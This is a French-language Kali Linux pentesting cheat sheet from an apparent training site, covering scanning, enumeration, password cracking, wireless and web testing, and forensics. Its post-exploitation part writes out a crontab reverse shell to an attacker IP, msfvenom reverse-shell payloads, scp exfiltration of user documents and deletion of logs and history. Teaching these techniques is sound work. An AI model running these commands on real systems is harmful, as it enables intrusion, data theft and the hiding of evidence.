Feuille de triche Kali Linux

Apprenez Kali Linux avec des laboratoires pratiques

Apprenez les tests d'intrusion Kali Linux grâce à des laboratoires pratiques et des scénarios réels. LabEx propose des cours complets sur Kali Linux couvrant les commandes essentielles, la numérisation de réseau, l'évaluation des vulnérabilités, les attaques par mot de passe, les tests d'applications Web et la criminalistique numérique. Maîtrisez les techniques de piratage éthique et les outils d'audit de sécurité.

Configuration et Configuration du Système

Configuration Initiale : sudo apt update

Mettre à jour les paquets et les dépôts du système pour des performances optimales.

# Mettre à jour le dépôt de paquets
sudo apt update
# Mettre à niveau les paquets installés
sudo apt upgrade
# Mise à niveau complète du système
sudo apt full-upgrade
# Installer les outils essentiels
sudo apt install curl wget git

Gestion des Utilisateurs : sudo useradd

Créer et gérer des comptes utilisateurs pour les tests de sécurité.

# Ajouter un nouvel utilisateur
sudo useradd -m username
# Définir le mot de passe
sudo passwd username
# Ajouter l'utilisateur au groupe sudo
sudo usermod -aG sudo username
# Changer d'utilisateur
su - username

Gestion des Services : systemctl

Contrôler les services et les démons système pour les scénarios de test.

# Démarrer le service
sudo systemctl start apache2
# Arrêter le service
sudo systemctl stop apache2
# Activer le service au démarrage
sudo systemctl enable ssh
# Vérifier l'état du service
sudo systemctl status postgresql

Configuration Réseau : ifconfig

Configurer les interfaces réseau pour les tests d’intrusion.

# Afficher les interfaces réseau
ifconfig
# Configurer l'adresse IP
sudo ifconfig eth0 192.168.1.100
# Mettre l'interface en marche/arrêt
sudo ifconfig eth0 up
# Configurer l'interface sans fil
sudo ifconfig wlan0 up

Variables d’Environnement : export

Configurer les variables d’environnement et les chemins du système de test.

# Définir l'IP cible
export TARGET=192.168.1.1
# Définir le chemin de la liste de mots
export WORDLIST=/usr/share/wordlists/rockyou.txt
# Afficher les variables d'environnement
env | grep TARGET
Quiz

Connectez-vous pour répondre à ce quiz et suivre votre progression d'apprentissage

Que se passe-t-il avec les variables d'environnement définies avec export ?
Elles persistent après les redémarrages du système
Elles ne sont disponibles que dans le fichier actuel
Elles sont disponibles pour le shell actuel et les processus enfants
Ce sont des variables système globales

Installation d’Outils : apt install

Installer des outils de sécurité et des dépendances supplémentaires.

# Installer des outils supplémentaires
sudo apt install nmap wireshark burpsuite
# Installer depuis GitHub
git clone https://github.com/tool/repo.git
# Installer des outils Python
pip3 install --user tool-name

Découverte et Numérisation de Réseau

Découverte d’Hôtes : nmap -sn

Identifier les hôtes actifs sur le réseau à l’aide de balayages ping.

# Balayage Ping
nmap -sn 192.168.1.0/24
# Balayage ARP (réseau local)
nmap -PR 192.168.1.0/24
# Balayage d'écho ICMP
nmap -PE 192.168.1.0/24
# Découverte rapide d'hôtes
masscan --ping 192.168.1.0/24

Numérisation de Ports : nmap

Analyser les ports ouverts et les services en cours d’exécution sur les systèmes cibles.

# Balayage TCP de base
nmap 192.168.1.1
# Balayage agressif
nmap -A 192.168.1.1
# Balayage UDP
nmap -sU 192.168.1.1
# Balayage SYN furtif
nmap -sS 192.168.1.1
Quiz

Connectez-vous pour répondre à ce quiz et suivre votre progression d'apprentissage

Que fait nmap -sS ?
Effectue un balayage UDP
Effectue un balayage SYN furtif (balayage demi-ouvert)
Analyse tous les ports
Effectue la détection du système d'exploitation

Énumération de Services : nmap -sV

Identifier les versions de services et les vulnérabilités potentielles.

# Détection de version
nmap -sV 192.168.1.1
# Détection du système d'exploitation
nmap -O 192.168.1.1
Quiz

Connectez-vous pour répondre à ce quiz et suivre votre progression d'apprentissage

Que fait nmap -sV ?
Détecte les versions de services s'exécutant sur les ports ouverts
Analyse uniquement les ports de contrôle de version
Affiche uniquement les services vulnérables
Effectue uniquement la détection du système d'exploitation
# Balayage de scripts nmap -sC 192.168.1.1 # Balayage complet nmap -sS -sV -O -A 192.168.1.1 ```

Collecte d’Informations et Reconnaissance

Énumération DNS : dig

Recueillir des informations DNS et effectuer des transferts de zone.

# Recherche DNS de base
dig example.com
# Recherche DNS inversée
dig -x 192.168.1.1
# Tentative de transfert de zone
dig @ns1.example.com example.com axfr
# Énumération DNS
dnsrecon -d example.com

Reconnaissance Web : dirb

Découvrir les répertoires et fichiers cachés sur les serveurs Web.

# Force brute de répertoires
dirb http://192.168.1.1
# Liste de mots personnalisée
dirb http://192.168.1.1 /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
# Alternative Gobuster
gobuster dir -u http://192.168.1.1 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

Informations WHOIS : whois

Recueillir des informations sur l’enregistrement et la propriété de domaines.

# Recherche WHOIS
whois example.com
# WHOIS IP
whois 8.8.8.8
# Collecte d'informations complète
theharvester -d example.com -l 100 -b google

Analyse SSL/TLS : sslscan

Analyser la configuration et les vulnérabilités SSL/TLS.

# Balayage SSL
sslscan 192.168.1.1:443
# Analyse complète testssl.sh
testssl.sh https://example.com
# Informations sur le certificat SSL
openssl s_client -connect example.com:443

Énumération SMB : enum4linux

Énumérer les partages SMB et les informations NetBIOS.

# Énumération SMB
enum4linux 192.168.1.1
# Lister les partages SMB
smbclient -L //192.168.1.1
# Se connecter au partage
smbclient //192.168.1.1/share
# Balayage de vulnérabilité SMB
nmap --script smb-vuln* 192.168.1.1

Énumération SNMP : snmpwalk

Recueillir des informations système via le protocole SNMP.

# SNMP walk
snmpwalk -c public -v1 192.168.1.1
# Vérification SNMP
onesixtyone -c community.txt 192.168.1.1
# Énumération SNMP
snmp-check 192.168.1.1

Analyse des Vulnérabilités et Exploitation

Analyse des Vulnérabilités : nessus

Identifier les vulnérabilités de sécurité à l’aide de scanners automatisés.

# Démarrer le service Nessus
sudo systemctl start nessusd
# Démarrer le scan OpenVAS
openvas-start
# Scanner de vulnérabilités Web Nikto
nikto -h http://192.168.1.1
# SQLmap pour l'injection SQL
sqlmap -u "http://example.com/page.php?id=1"

Framework Metasploit : msfconsole

Lancer des exploits et gérer les campagnes de tests d’intrusion.

# Démarrer Metasploit
msfconsole
# Rechercher des exploits
search ms17-010
# Utiliser l'exploit
use exploit/windows/smb/ms17_010_eternalblue
# Définir l'hôte distant
set RHOSTS 192.168.1.1

Test de Dépassement de Tampon : pattern_create

Générer des motifs pour l’exploitation de dépassement de tampon.

# Créer un motif
pattern_create.rb -l 400
# Trouver le décalage
pattern_offset.rb -l 400 -q EIP_value

Développement d’Exploits Personnalisés : msfvenom

Créer des charges utiles personnalisées pour des cibles spécifiques.

# Générer du shellcode
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f c
# Shell inversé Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > shell.exe
# Shell inversé Linux
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f elf > shell.elf

Attaques par Mot de Passe et Tests d’Accréditation

Attaques par Force Brute : hydra

Effectuer des attaques par force brute de connexion contre divers services.

# Force brute SSH
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1
# Force brute de formulaire HTTP
hydra -l admin -P passwords.txt 192.168.1.1 http-form-post "/login:username=^USER^&password=^PASS^:Invalid"
# Force brute FTP
hydra -L users.txt -P passwords.txt ftp://192.168.1.1

Crackage de Hachage : hashcat

Craquer des hachages de mots de passe à l’aide de l’accélération GPU.

# Crackage de hachage MD5
hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
# Crackage de hachage NTLM
hashcat -m 1000 -a 0 ntlm.hash wordlist.txt
# Générer des variations de liste de mots
hashcat --stdout -r /usr/share/hashcat/rules/best64.rule wordlist.txt

John the Ripper : john

Crackage de mots de passe traditionnel avec divers modes d’attaque.

# Craquer le fichier de mot de passe
john --wordlist=/usr/share/wordlists/rockyou.txt shadow.txt
# Afficher les mots de passe craqués
john --show shadow.txt
# Mode incrémentiel
john --incremental shadow.txt
# Règles personnalisées
john --rules --wordlist=passwords.txt shadow.txt

Génération de Listes de Mots : crunch

Créer des listes de mots personnalisées pour des attaques ciblées.

# Générer une liste de mots de 4 à 8 caractères
crunch 4 8 -o wordlist.txt
# Jeu de caractères personnalisé
crunch 6 6 -t admin@ -o passwords.txt
# Génération basée sur un modèle
crunch 8 8 -t @@@@%%%% -o mixed.txt

Tests de Sécurité des Réseaux Sans Fil

Configuration du Mode Moniteur : airmon-ng

Configurer l’adaptateur sans fil pour la capture de paquets et l’injection.

# Activer le mode moniteur
sudo airmon-ng start wlan0
# Vérifier les processus interférents
sudo airmon-ng check kill
# Arrêter le mode moniteur
sudo airmon-ng stop wlan0mon

Découverte de Réseau : airodump-ng

Découvrir et surveiller les réseaux sans fil et les clients.

# Balayer tous les réseaux
sudo airodump-ng wlan0mon
# Cibler un réseau spécifique
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
# Afficher uniquement les réseaux WEP
sudo airodump-ng --encrypt WEP wlan0mon

Attaques WPA/WPA2 : aircrack-ng

Effectuer des attaques contre les réseaux chiffrés WPA/WPA2.

# Attaque de désauthentification
sudo aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon
# Craquer la poignée de main capturée
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
# Attaque WPS avec Reaver
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv

Attaque de Jumeau Malveillant : hostapd

Créer des points d’accès pirates pour la récolte d’informations d’identification.

# Démarrer l'AP pirate
sudo hostapd hostapd.conf
# Service DHCP
sudo dnsmasq -C dnsmasq.conf
# Capturer les informations d'identification
ettercap -T -M arp:remote /192.168.1.0/24//

Tests de Sécurité des Applications Web

Tests d’Injection SQL : sqlmap

Détection et exploitation automatisées des injections SQL.

# Test d'injection SQL de base
sqlmap -u "http://example.com/page.php?id=1"
# Tester les paramètres POST
sqlmap -u "http://example.com/login.php" --data="username=admin&password=test"
# Extraire la base de données
sqlmap -u "http://example.com/page.php?id=1" --dbs
# Vider une table spécifique
sqlmap -u "http://example.com/page.php?id=1" -D database -T users --dump

Scripting Inter-Sites (XSS) : xsser

Tester les vulnérabilités XSS dans les applications Web.

# Test XSS
xsser --url "http://example.com/search.php?q=XSS"
# Détection XSS automatisée
xsser -u "http://example.com" --crawl=10
# Charge utile personnalisée
xsser --url "http://example.com" --payload="<script>alert(1)</script>"

Intégration Burp Suite : burpsuite

Plateforme complète de tests de sécurité des applications Web.

# Démarrer Burp Suite
burpsuite
# Configurer le proxy (127.0.0.1:8080)
# Configurer le proxy du navigateur pour capturer le trafic
# Utiliser Intruder pour les attaques automatisées
# Spider pour la découverte de contenu

Traversal de Répertoire : wfuzz

Tester les vulnérabilités d’inclusion de fichiers et de traversal de répertoire.

# Fuzzing de répertoire
wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404 http://192.168.1.1/FUZZ
# Fuzzing de paramètre
wfuzz -c -z file,payloads.txt "http://example.com/page.php?file=FUZZ"

Post-Exploitation et Escalade de Privilèges

Énumération du Système : linpeas

Énumération automatisée de l’escalade de privilèges pour les systèmes Linux.

# Télécharger LinPEAS
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
# Rendre exécutable
chmod +x linpeas.sh
# Exécuter l'énumération
./linpeas.sh
# Alternative Windows : winPEAS.exe

Mécanismes de Persistance : crontab

Établir la persistance sur les systèmes compromis.

# Modifier crontab
crontab -e
# Ajouter un shell inversé
@reboot /bin/bash -c 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1'
# Persistance de clé SSH
echo "ssh-rsa AAAA..." >> ~/.ssh/authorized_keys

Exfiltration de Données : scp

Transférer des données en toute sécurité depuis des systèmes compromis.

# Copier un fichier vers la machine de l'attaquant
scp file.txt user@192.168.1.100:/tmp/
# Compresser et transférer
tar -czf data.tar.gz /home/user/documents
scp data.tar.gz attacker@192.168.1.100:/tmp/
# Exfiltration HTTP
python3 -m http.server 8000

Couvrir les Traces : history

Supprimer les preuves des activités sur les systèmes compromis.

# Effacer l'historique bash
history -c
unset HISTFILE
# Effacer des entrées spécifiques
history -d line_number
# Effacer les journaux système
sudo rm /var/log/auth.log*

Criminalistique Numérique et Analyse

Imagerie de Disque : dd

Créer des images forensiques de périphériques de stockage.

# Créer une image disque
sudo dd if=/dev/sdb of=/tmp/evidence.img bs=4096 conv=noerror,sync
# Vérifier l'intégrité de l'image
md5sum /dev/sdb > original.md5
md5sum /tmp/evidence.img > image.md5
# Monter l'image
sudo mkdir /mnt/evidence
sudo mount -o ro,loop /tmp/evidence.img /mnt/evidence

Récupération de Fichiers : foremost

Récupérer les fichiers supprimés à partir d’images disque ou de lecteurs.

# Récupérer des fichiers à partir de l'image
foremost -i evidence.img -o recovered/
# Types de fichiers spécifiques
foremost -t jpg,png,pdf -i evidence.img -o photos/
# Alternative PhotoRec
photorec evidence.img

Analyse de Mémoire : volatility

Analyser les vidages de RAM pour obtenir des preuves forensiques.

# Identifier le profil OS
volatility -f memory.dump imageinfo
# Lister les processus
volatility -f memory.dump --profile=Win7SP1x64 pslist
# Extraire le processus
volatility -f memory.dump --profile=Win7SP1x64 procdump -p 1234 -D output/

Analyse de Paquets Réseau : wireshark

Analyser les captures de trafic réseau pour des preuves forensiques.

# Démarrer Wireshark
wireshark
# Analyse en ligne de commande
tshark -r capture.pcap -Y "http.request.method==GET"
# Extraire des fichiers
foremost -i capture.pcap -o extracted/

Génération de Rapports et Documentation

Capture de Capture d’Écran : gnome-screenshot

Documenter les découvertes avec une capture d’écran systématique.

# Capture d'écran complète
gnome-screenshot -f screenshot.png
# Capture de fenêtre
gnome-screenshot -w -f window.png
# Capture retardée
gnome-screenshot -d 5 -f delayed.png
# Sélection de zone
gnome-screenshot -a -f area.png

Gestion des Journaux : script

Enregistrer les sessions de terminal à des fins de documentation.

# Démarrer l'enregistrement de session
script session.log
# Enregistrer avec chronométrage
script -T session.time session.log
# Rejouer la session
scriptreplay session.time session.log

Modèles de Rapport : reportlab

Générer des rapports de tests d’intrusion professionnels.

# Installer les outils de rapport
pip3 install reportlab
# Générer un rapport PDF
python3 generate_report.py
# Markdown vers PDF
pandoc report.md -o report.pdf

Intégrité des Preuves : sha256sum

Maintenir la chaîne de possession avec des hachages cryptographiques.

# Générer des sommes de contrôle
sha256sum evidence.img > evidence.sha256
# Vérifier l'intégrité
sha256sum -c evidence.sha256
# Sommes de contrôle de fichiers multiples
find /evidence -type f -exec sha256sum {} \; > all_files.sha256

Maintenance et Optimisation du Système

Gestion des Paquets : apt

Maintenir et mettre à jour les paquets système et les outils de sécurité.

# Mettre à jour les listes de paquets
sudo apt update
# Mettre à niveau tous les paquets
sudo apt upgrade
# Installer un outil spécifique
sudo apt install tool-name
# Supprimer les paquets inutilisés
sudo apt autoremove

Mises à Jour du Noyau : uname

Surveiller et mettre à jour le noyau du système pour les correctifs de sécurité.

# Vérifier le noyau actuel
uname -r
# Lister les noyaux disponibles
apt list --upgradable | grep linux-image
# Installer le nouveau noyau
sudo apt install linux-image-generic
# Supprimer les anciens noyaux
sudo apt autoremove --purge

Vérification des Outils : which

Vérifier les installations d’outils et localiser les exécutables.

# Localiser l'outil
which nmap
# Vérifier si l'outil existe
command -v metasploit
# Lister tous les outils dans le répertoire
ls /usr/bin/ | grep -i security

Surveillance des Ressources : htop

Surveiller les ressources système pendant les tests de sécurité intensifs.

# Visionneuse de processus interactive
htop
# Utilisation de la mémoire
free -h
# Utilisation du disque
df -h
# Connexions réseau
netstat -tulnp

Raccourcis et Alias Essentiels de Kali Linux

Créer des Alias : .bashrc

Configurer des raccourcis de commande pour gagner du temps lors des tâches fréquentes.

# Éditer bashrc
nano ~/.bashrc
# Ajouter des alias utiles
alias ll='ls -la'
alias nse='nmap --script-help'
alias target='export TARGET='
alias msf='msfconsole -q'
# Recharger bashrc
source ~/.bashrc

Fonctions Personnalisées : function

Créer des combinaisons de commandes avancées pour les flux de travail courants.

# Fonction de scan nmap rapide
function qscan() {
    nmap -sS -sV -O $1
}
# Configuration de la configuration de pentest
function pentest-setup() {
    mkdir -p {recon,scans,exploits,loot}
}

Raccourcis Clavier : Terminal

Maîtriser les raccourcis clavier essentiels pour une navigation plus rapide.

# Raccourcis du terminal
# Ctrl+C - Tuer la commande actuelle
# Ctrl+Z - Suspendre la commande actuelle
# Ctrl+L - Effacer l'écran
# Ctrl+R - Rechercher dans l'historique des commandes
# Tab - Complétion automatique des commandes
# Haut/Bas - Naviguer dans l'historique des commandes

Configuration de l’Environnement : tmux

Configurer des sessions de terminal persistantes pour les tâches de longue durée.

# Démarrer une nouvelle session
tmux new-session -s pentest
# Détacher la session
# Ctrl+B, D
# Lister les sessions
tmux list-sessions
# Attacher à la session
tmux attach -t pentest

Liens Pertinents